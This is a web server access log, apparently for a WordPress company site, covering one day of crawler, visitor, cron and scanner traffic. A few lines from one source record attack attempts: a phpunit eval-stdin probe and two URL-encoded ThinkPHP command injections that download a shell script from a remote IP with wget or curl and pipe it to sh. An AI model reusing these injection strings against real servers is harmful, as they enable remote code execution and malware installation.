198.244.242.119 - - [18/Jan/2026:09:38:34 +0800] "GET /2215/ HTTP/1.1" 200 20286 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
192.159.99.95 - - [18/Jan/2026:09:43:47 +0800] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 499 0 "-" "Mozilla/5.0 (rondo2012@atomicmail.io)"
36.133.115.36 - - [18/Jan/2026:09:45:24 +0800] "POST /wp-cron.php?doing_wp_cron=1768700724.3791840076446533203125 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
43.157.172.39 - - [18/Jan/2026:09:45:24 +0800] "GET / HTTP/1.1" 200 34745 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [18/Jan/2026:09:58:28 +0800] "POST /wp-cron.php?doing_wp_cron=1768701508.5497999191284179687500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
111.172.249.49 - - [18/Jan/2026:09:58:28 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
111.172.249.49 - - [18/Jan/2026:09:58:30 +0800] "GET / HTTP/1.1" 200 34745 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [18/Jan/2026:10:02:43 +0800] "POST /wp-cron.php?doing_wp_cron=1768701763.4844620227813720703125 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
38.46.221.123 - - [18/Jan/2026:10:02:43 +0800] "GET http://check.9tb.org/ HTTP/1.1" 301 5 "-" "Go-http-client/1.1"
193.142.147.209 - - [18/Jan/2026:10:02:45 +0800] "POST / HTTP/1.1" 200 34743 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
38.46.221.123 - - [18/Jan/2026:10:02:45 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 40643 "http://check.9tb.org" "Go-http-client/1.1"
36.133.115.36 - - [18/Jan/2026:10:13:23 +0800] "POST /wp-cron.php?doing_wp_cron=1768702403.4455618858337402343750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.219 - - [18/Jan/2026:10:13:23 +0800] "GET / HTTP/1.1" 200 34744 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [18/Jan/2026:10:26:56 +0800] "POST /wp-cron.php?doing_wp_cron=1768703216.3372941017150878906250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
43.130.31.17 - - [18/Jan/2026:10:26:56 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.130.31.17 - - [18/Jan/2026:10:26:58 +0800] "GET / HTTP/1.1" 200 34745 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [18/Jan/2026:10:35:33 +0800] "POST /wp-cron.php?doing_wp_cron=1768703733.4883060455322265625000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
66.249.73.169 - - [18/Jan/2026:10:35:33 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.170 - - [18/Jan/2026:10:35:36 +0800] "GET /2418/ HTTP/1.1" 200 23255 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.192 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
36.133.115.36 - - [18/Jan/2026:10:44:41 +0800] "POST /wp-cron.php?doing_wp_cron=1768704281.6029570102691650390625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
192.159.99.95 - - [18/Jan/2026:10:44:41 +0800] "GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.txg.sh%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.txg.sh%7C%7Ccurl%20-s%20http%3A%2F%2F41.231.37.153%2Frondo.txg.sh%29%7Csh HTTP/1.1" 200 65632 "-" "Mozilla/5.0 (rondo2012@atomicmail.io)"
36.133.115.36 - - [18/Jan/2026:10:51:55 +0800] "POST /wp-cron.php?doing_wp_cron=1768704715.4009950160980224609375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.18 - - [18/Jan/2026:10:51:55 +0800] "GET /backup/ HTTP/1.1" 301 5 "-" "-"
204.76.203.18 - - [18/Jan/2026:10:51:58 +0800] "GET /backup/ HTTP/1.1" 301 5 "-" "-"
204.76.203.18 - - [18/Jan/2026:10:52:01 +0800] "GET /backup/ HTTP/1.1" 301 5 "-" "-"
204.76.203.18 - - [18/Jan/2026:10:52:05 +0800] "GET /backup/ HTTP/1.1" 301 5 "-" "-"
204.76.203.18 - - [18/Jan/2026:10:52:09 +0800] "GET /backup/ HTTP/1.1" 301 5 "-" "-"
51.195.183.249 - - [18/Jan/2026:10:55:36 +0800] "GET /media/ HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
36.133.115.36 - - [18/Jan/2026:11:06:54 +0800] "POST /wp-cron.php?doing_wp_cron=1768705614.4593830108642578125000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.219 - - [18/Jan/2026:11:06:54 +0800] "GET / HTTP/1.1" 200 34745 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [18/Jan/2026:11:08:45 +0800] "POST /wp-cron.php?doing_wp_cron=1768705725.6579270362854003906250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
207.56.13.127 - - [18/Jan/2026:11:08:45 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0"
207.56.13.127 - - [18/Jan/2026:11:08:46 +0800] "GET / HTTP/1.1" 200 171342 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0"
66.167.166.154 - - [18/Jan/2026:11:12:11 +0800] "POST /HNAP1/ HTTP/1.0" 400 0 "-" "-"
36.133.115.36 - - [18/Jan/2026:11:13:23 +0800] "POST /wp-cron.php?doing_wp_cron=1768706002.9754528999328613281250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
38.46.221.123 - - [18/Jan/2026:11:13:23 +0800] "GET http://check.9tb.org/ HTTP/1.1" 301 5 "-" "Go-http-client/1.1"
38.46.221.123 - - [18/Jan/2026:11:13:23 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 40643 "http://check.9tb.org" "Go-http-client/1.1"
36.133.115.36 - - [18/Jan/2026:11:15:15 +0800] "POST /wp-cron.php?doing_wp_cron=1768706115.1256260871887207031250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
147.185.132.32 - - [18/Jan/2026:11:15:15 +0800] "GET /wp-login.php HTTP/1.1" 200 9053 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
36.133.115.36 - - [18/Jan/2026:11:32:09 +0800] "POST /wp-cron.php?doing_wp_cron=1768707129.2482640743255615234375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
157.230.105.206 - - [18/Jan/2026:11:32:09 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
157.230.105.206 - - [18/Jan/2026:11:32:18 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
157.230.105.206 - - [18/Jan/2026:11:32:25 +0800] "GET / HTTP/1.1" 200 40643 "http://36.133.115.36" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
36.133.115.36 - - [18/Jan/2026:11:38:00 +0800] "POST /wp-cron.php?doing_wp_cron=1768707480.3713939189910888671875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
156.245.144.100 - - [18/Jan/2026:11:38:00 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0"
156.245.144.100 - - [18/Jan/2026:11:38:00 +0800] "GET / HTTP/1.1" 200 171342 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0"
36.133.115.36 - - [18/Jan/2026:11:45:35 +0800] "POST /wp-cron.php?doing_wp_cron=1768707935.0835831165313720703125 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
5.61.209.92 - - [18/Jan/2026:11:45:35 +0800] "GET /SDK/webLanguage HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [18/Jan/2026:11:54:15 +0800] "POST /wp-cron.php?doing_wp_cron=1768708455.8435609340667724609375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
116.179.32.24 - - [18/Jan/2026:11:54:15 +0800] "GET /services HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
116.179.32.212 - - [18/Jan/2026:11:54:15 +0800] "GET /services/ HTTP/1.1" 200 31641 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
116.179.37.2 - - [18/Jan/2026:11:54:17 +0800] "GET /wp-content/uploads/2025/12/1764853155-ISO2-214x300.webp HTTP/1.1" 200 12682 "http://cqqizhou.com/services/" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
209.50.227.249 - - [18/Jan/2026:11:58:47 +0800] "GET / HTTP/1.1" 200 40643 "-" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.166 Safari/537.36"
205.169.39.3 - - [18/Jan/2026:11:59:17 +0800] "GET / HTTP/1.1" 200 40643 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.3 - - [18/Jan/2026:11:59:19 +0800] "GET /wp-content/uploads/2025/07/1751425283-qizhou.kf_.qq_.com_.webp HTTP/1.1" 200 16864 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.3 - - [18/Jan/2026:11:59:21 +0800] "GET /wp-content/uploads/2025/07/1750174127-Marketing1920x800_3.webp HTTP/1.1" 200 52790 "http://cqqizhou.com/wp-content/uploads/elementor/css/post-1666.css?ver=1768526227" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.3 - - [18/Jan/2026:11:59:21 +0800] "GET /wp-content/uploads/2025/07/1753456723-%E5%8F%8C%E7%9B%B8%E9%92%A2roduct_Single600.webp HTTP/1.1" 200 22790 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.3 - - [18/Jan/2026:11:59:22 +0800] "GET /wp-content/uploads/2025/07/1753456770-%E7%83%AD%E9%95%80%E9%94%8C%E5%8D%B7product_Single600.webp HTTP/1.1" 200 27502 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.3 - - [18/Jan/2026:11:59:22 +0800] "GET /wp-content/uploads/2025/07/1753453127-%E4%BD%99%E5%8D%B7product_Single600%C3%97284.webp HTTP/1.1" 200 18744 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.3 - - [18/Jan/2026:11:59:22 +0800] "GET /wp-content/uploads/2025/07/1753453096-%E5%8F%8C%E7%9B%B8%E9%92%A2product_Single600%C3%97284.webp HTTP/1.1" 200 14562 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.3 - - [18/Jan/2026:11:59:23 +0800] "GET /wp-content/uploads/2025/12/1765268955-qizhou_Slider1_3840%C3%972160_20251210-scaled.webp HTTP/1.1" 200 152162 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.3 - - [18/Jan/2026:11:59:24 +0800] "GET /wp-content/uploads/2026/01/1768276119-qizhoujiagong_Slider_3840%C3%972160_20260113-scaled-50x100.webp HTTP/1.1" 200 976 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.3 - - [18/Jan/2026:11:59:24 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled-50x100.webp HTTP/1.1" 200 1416 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
36.133.115.36 - - [18/Jan/2026:11:59:24 +0800] "POST /wp-cron.php?doing_wp_cron=1768708764.2703449726104736328125 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
205.169.39.3 - - [18/Jan/2026:11:59:24 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 33 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.3 - - [18/Jan/2026:11:59:24 +0800] "GET /wp-content/uploads/2026/01/1768276119-qizhoujiagong_Slider_3840%C3%972160_20260113-scaled-50x100.webp HTTP/1.1" 200 976 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.3 - - [18/Jan/2026:11:59:24 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled-50x100.webp HTTP/1.1" 200 1416 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.3 - - [18/Jan/2026:11:59:24 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=4 HTTP/1.1" 200 2580 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.3 - - [18/Jan/2026:11:59:25 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=2 HTTP/1.1" 200 2000 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.3 - - [18/Jan/2026:11:59:25 +0800] "GET /wp-content/uploads/2026/01/1768276119-qizhoujiagong_Slider_3840%C3%972160_20260113-scaled.webp HTTP/1.1" 200 131696 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.3 - - [18/Jan/2026:11:59:29 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled.webp HTTP/1.1" 200 197360 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
23.82.99.116 - - [18/Jan/2026:11:59:30 +0800] "GET / HTTP/1.1" 200 40643 "-" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.166 Safari/537.36"
205.169.39.3 - - [18/Jan/2026:11:59:33 +0800] "GET /wp-content/uploads/2025/12/1765268955-qizhou_Slider1_3840%C3%972160_20251210-scaled-50x100.webp HTTP/1.1" 200 1812 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.3 - - [18/Jan/2026:11:59:33 +0800] "GET /wp-content/uploads/2025/12/1765268955-qizhou_Slider1_3840%C3%972160_20251210-scaled-50x100.webp HTTP/1.1" 200 1812 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.3 - - [18/Jan/2026:11:59:34 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 33 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
36.133.115.36 - - [18/Jan/2026:12:04:39 +0800] "POST /wp-cron.php?doing_wp_cron=1768709079.5002019405364990234375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.219 - - [18/Jan/2026:12:04:39 +0800] "GET / HTTP/1.1" 200 34745 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [18/Jan/2026:12:08:56 +0800] "POST /wp-cron.php?doing_wp_cron=1768709336.7687470912933349609375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
3.137.73.221 - - [18/Jan/2026:12:08:56 +0800] "GET / HTTP/1.1" 301 5 "-" "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
3.137.73.221 - - [18/Jan/2026:12:08:58 +0800] "GET / HTTP/1.1" 301 5 "-" "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
23.82.99.116 - - [18/Jan/2026:12:20:18 +0800] "GET / HTTP/1.1" 200 40643 "-" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.166 Safari/537.36"
36.133.115.36 - - [18/Jan/2026:12:25:33 +0800] "POST /wp-cron.php?doing_wp_cron=1768710333.9185469150543212890625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
38.46.221.123 - - [18/Jan/2026:12:25:33 +0800] "GET http://check.9tb.org/ HTTP/1.1" 301 5 "-" "Go-http-client/1.1"
38.46.221.123 - - [18/Jan/2026:12:25:34 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 40643 "http://check.9tb.org" "Go-http-client/1.1"
36.133.115.36 - - [18/Jan/2026:12:33:14 +0800] "POST /wp-cron.php?doing_wp_cron=1768710794.6200740337371826171875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
43.159.141.150 - - [18/Jan/2026:12:33:14 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.159.141.150 - - [18/Jan/2026:12:33:16 +0800] "GET / HTTP/1.1" 200 34745 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
192.159.99.95 - - [18/Jan/2026:12:41:17 +0800] "GET /index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=%28wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.txg.sh%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.txg.sh%7C%7Ccurl%20-s%20http%3A%2F%2F41.231.37.153%2Frondo.txg.sh%29%7Csh HTTP/1.1" 499 0 "-" "Mozilla/5.0 (rondo2012@atomicmail.io)"
157.55.39.202 - - [18/Jan/2026:12:51:25 +0800] "GET /2339/ HTTP/1.1" 200 24472 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [18/Jan/2026:12:53:05 +0800] "POST /wp-cron.php?doing_wp_cron=1768711985.6373369693756103515625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
95.214.55.246 - - [18/Jan/2026:12:53:05 +0800] "GET / HTTP/1.1" 200 109837 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36"
193.142.147.209 - - [18/Jan/2026:12:53:10 +0800] "POST / HTTP/1.1" 200 34745 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
36.133.115.36 - - [18/Jan/2026:12:56:23 +0800] "POST /wp-cron.php?doing_wp_cron=1768712183.1086690425872802734375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.219 - - [18/Jan/2026:12:56:23 +0800] "GET / HTTP/1.1" 200 34745 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [18/Jan/2026:12:57:47 +0800] "POST /wp-cron.php?doing_wp_cron=1768712267.3534939289093017578125 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
157.55.39.9 - - [18/Jan/2026:12:57:47 +0800] "GET /?s=2025 HTTP/1.1" 200 19861 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
116.179.32.199 - - [18/Jan/2026:12:59:42 +0800] "GET / HTTP/1.1" 200 40643 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [18/Jan/2026:13:08:46 +0800] "POST /wp-cron.php?doing_wp_cron=1768712926.0953021049499511718750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
152.32.252.94 - - [18/Jan/2026:13:08:46 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
152.32.252.94 - - [18/Jan/2026:13:09:04 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
152.32.252.94 - - [18/Jan/2026:13:09:05 +0800] "GET /sitemap.xml HTTP/1.1" 200 491 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
36.133.115.36 - - [18/Jan/2026:13:18:23 +0800] "POST /wp-cron.php?doing_wp_cron=1768713503.8513660430908203125000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
108.165.164.187 - - [18/Jan/2026:13:18:23 +0800] "HEAD /wordpress HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
108.165.164.187 - - [18/Jan/2026:13:18:24 +0800] "HEAD /Wordpress HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
108.165.164.187 - - [18/Jan/2026:13:18:25 +0800] "HEAD /WORDPRESS HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
108.165.164.187 - - [18/Jan/2026:13:18:26 +0800] "HEAD /WordPress HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
108.165.164.187 - - [18/Jan/2026:13:18:27 +0800] "HEAD /wp HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
108.165.164.187 - - [18/Jan/2026:13:18:28 +0800] "HEAD /Wp HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
108.165.164.187 - - [18/Jan/2026:13:18:28 +0800] "HEAD /WP HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
108.165.164.187 - - [18/Jan/2026:13:18:29 +0800] "HEAD /old HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
108.165.164.187 - - [18/Jan/2026:13:18:30 +0800] "HEAD /Old HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
108.165.164.187 - - [18/Jan/2026:13:18:31 +0800] "HEAD /OLD HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
108.165.164.187 - - [18/Jan/2026:13:18:32 +0800] "HEAD /oldsite HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
108.165.164.187 - - [18/Jan/2026:13:18:33 +0800] "HEAD /new HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
108.165.164.187 - - [18/Jan/2026:13:18:33 +0800] "HEAD /news/ HTTP/1.1" 200 0 "http://cqqizhou.com/new" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
108.165.164.187 - - [18/Jan/2026:13:18:34 +0800] "HEAD /New HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
